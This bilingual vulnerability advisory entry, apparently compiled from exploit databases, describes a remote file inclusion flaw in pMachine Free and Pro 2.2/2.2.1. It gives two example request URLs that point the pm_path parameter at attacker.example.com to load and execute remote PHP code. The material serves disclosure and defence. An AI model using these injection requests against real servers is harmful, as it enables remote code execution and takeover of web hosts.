https://www.exploit-db.com/exploits/22776
https://www.securityfocus.com/bid/77843
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200306-110

pMachineFree和pMachinePro2.2及2.2.1版本的pm/lib.inc.php存在PHP远程文件包含漏洞。远程攻击者可以通过修改pm_path参数引用远程web服务器上包含代码的URL，从而执行任意PHP代码。

source: http://www.securityfocus.com/bid/7919/info

It has been reported that PMachine does not properly handle include files under some circumstances. Because of this, an attacker may be able to remotely execute commands.

http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=.txt with:

http://attacker.example.com/config.txt

or

http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=/badcode.txt with:

http://attacker.example.com/config/badcode.txt

PMachine PMachine Pro 2.2.1

PMachine PMachine Pro 2.2

PMachine Pmachine Free 0

来源:www.pmachine.com
链接:http://www.pmachine.com/forum/threads.php?id=7274_0_13_0_C
来源:BUGTRAQ
名称:20030623pMachine(PHP):Include()SecurityHole
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105638414205498&w;=2